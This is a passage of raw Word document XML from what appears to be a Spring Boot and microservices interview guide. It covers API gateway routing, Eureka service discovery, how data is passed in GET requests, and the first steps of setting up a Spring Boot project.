    <w:p w14:paraId="7B70EE2E"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API Gateway pattern abstracts the complexity of multiple microservices by acting as a single entry point for client requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366E4B8E"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 with Spring Cloud Gateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40554F57"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spring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D1A4C2"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cloud:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAA6C63"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ateway:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="710CD77F"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outes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B4128F"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id: serviceA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B38AF52"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uri: http://localhost:8081</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28AABF8C"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edicates:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398320C5"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Path=/serviceA/**</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768D0745"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this example, requests to /serviceA/** will be routed to http://localhost:8081.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B5CDCE0" w14:textId="77777777" w:rsidR="00BA6A8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A281301">
          <v:rect id="_x0000_i2664" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="54924C20" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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6. Service Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7F3DCC"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Microservices can register themselves with a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Eureka</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Consul</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) so that other services can discover them.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B726A3E"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ervice Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> eliminates the need for hardcoding URLs for communication, as services can look up each other's addresses dynamically.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6289AA"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 with Spring Cloud Eureka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624820FD"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ableEurekaServer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042668C6"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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508E25C2"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EurekaServerApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784B554C"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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D142BEF"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pringApplication.run(EurekaServerApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E65C40"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656DB06E"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3C165A1B"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ervice A Configuration (Client)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408B9819"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ableDiscoveryClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4656CC33"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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AE4A78F"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ServiceAApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FCC310"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atic void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD3F36F"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pringApplication.run(ServiceAApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2ED321"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586643EC"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64891A5"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 this example, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service A</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> will register itself with the Eureka server, and other services can discover it by querying the registry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090849C7" w14:textId="77777777" w:rsidR="00BA6A8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E6DF37D">
          <v:rect id="_x0000_i2665" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E02FAD0" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735CB4C8"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RESTful APIs</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (synchronous HTTP requests) are commonly used for microservice-to-microservice communication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469057D7"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For </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous communication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, you can use message brokers like </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka</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RabbitMQ</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A869E43"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For high-performance communication, </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>gRPC</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be considered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09722AF0"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PI Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Service Discovery</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to manage and simplify communication between microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BE5EE4F"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ach approach has its strengths depending on the use case, and it's important to choose the right one based on the communication requirements, performance considerations, and the architecture of your microservices.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D79F5E" w14:textId="4C321805"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275CC7A">
          <v:rect id="_x0000_i2666" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BA1BDEB" w14:textId="40B7C48B" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="633" w:name="_Toc196308113"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What kind of information are you passing to the GET method</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="633"/>
    </w:p>
    <w:p w14:paraId="424E1298" w14:textId="6589B911" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A84"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 a </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> method, information is typically passed in the form of </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>query parameters</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path variables</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. The data passed through GET is typically used to retrieve or filter resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C3B9E"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Here are the ways information can be passed to the GET method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F7F38A" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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Query Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A46D87D"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se are key-value pairs appended to the URL after a ?. Multiple parameters can be added, separated by &amp;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEC07B4"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mmon use cases: filtering, sorting, pagination, or searching.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF06B7E"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p>
    <w:p w14:paraId="31589837"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T /api/employees?department=HR&amp;age=30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED44ED9"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this case, the GET request is passing two query parameters: department and age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E19EA5"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Spring Boot, you can access these parameters using @RequestParam:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678FE22D"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ontroller Method Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E4C812"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tMapping("/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04DC075A"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public List&lt;Employee&gt; getEmployees(@RequestParam String department, @RequestParam int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0812ACA4"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logic to retrieve employees filtered by department and age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F75B1BF"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7130BFA1"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Query Parameter Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76347C1F"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questParam String department</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A9C2F" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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Path Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9698B5"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ath variables are part of the URL path itself, often used to uniquely identify a resource.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126D253C"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is typically used to access specific resources or nested resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003A1B3C"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p>
    <w:p w14:paraId="50337542"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T /api/employees/{employeeId}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6126421D"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this case, employeeId is passed as part of the URL path.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C3324C"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Spring Boot, you can access the path variable using @PathVariable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426D4655"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ontroller Method Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="752FF19C"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tMapping("/employees/{employeeId}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B54D97E"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Employee getEmployee(@PathVariable Long employeeId) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11289F4D"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logic to retrieve employee by ID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E740F5C"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257E13B7" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C71E68"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Headers are used for passing metadata such as authentication tokens or content type.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E66E33"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uthorization</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> headers are often used in secured API calls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="201E5C18"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p>
    <w:p w14:paraId="47BFB5B9"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T /api/employees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AB4C1B"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uthorization: Bearer &lt;token&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66936FBD"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access headers in Spring Boot using @RequestHeader:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41328DE3"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ontroller Method Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7A0A57"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tMapping("/employees")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EB9362"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List&lt;Employee&gt; getEmployees(@RequestHeader("Authorization") String token) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F81E009"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logic to retrieve employees with authorization logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547C6D0B"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4702C8B" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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4. Request Body (Typically Not for GET)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E699967"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Although </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> requests are not intended to have a body, some systems or APIs may allow a body to be passed, but this is rare and not recommended for </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="542ED424"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For requests where you need to send a large amount of data, POST, PUT, or PATCH would be more appropriate.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238D4D1C" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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ummary:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED3F173"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Query Parameters:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use @RequestParam for parameters like filters or search criteria.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E2D785"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ath Variables:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use @PathVariable for resource identifiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5072BDD7"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Headers:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use @RequestHeader for headers like Authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE9C79B" w14:textId="77777777" w:rsidR="00BA6A84" w:rsidRPr="002C6305" w:rsidRDefault="00BA6A8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a GET method, the data you pass is typically intended to retrieve or filter resources, not modify them. GET is generally used for read-only requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21AD38EA" w14:textId="05AF17A1"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7586889">
          <v:rect id="_x0000_i2667" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="388C7E56" w14:textId="2CCDD748" w:rsidR="007D2E6B" w:rsidRPr="00CE4B95" w:rsidRDefault="00827C49">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="634" w:name="_Toc196308114"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Suppose I want to start a spring boot application, so what are all the steps</w:t>
      </w:r>
      <w:r w:rsidR="007D2E6B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="634"/>
    </w:p>
    <w:p w14:paraId="086839B9" w14:textId="14681F78" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107"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o start a Spring Boot application, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217B1CD1" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B110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Set up the Project</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0D30A8"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either:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14104F63"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Manually create the project structure</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C23ED6"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e Spring Initializr</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (a web-based tool) to generate a skeleton for the project.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F18896"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ing Spring Initializr:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B11AB19"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Visit </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidRPr="002C6305">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
            <w:color w:val="auto"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>Spring Initializr</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDDB84C"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lect the following:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F409C2" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107"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roject:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Maven or Gradle (Maven is commonly used)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182742A0" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107"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Language:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Java</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3533C439" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107"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ring Boot version:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Choose the latest stable version</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB9F38" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107"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roject Metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5917D905" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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Group:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., com.example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ED7F12" w14:textId="77777777" w:rsidR="006B1107" w:rsidRPr="002C6305" w:rsidRDefault="006B1107" w:rsidP="002C6305">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="216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rtifact:</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
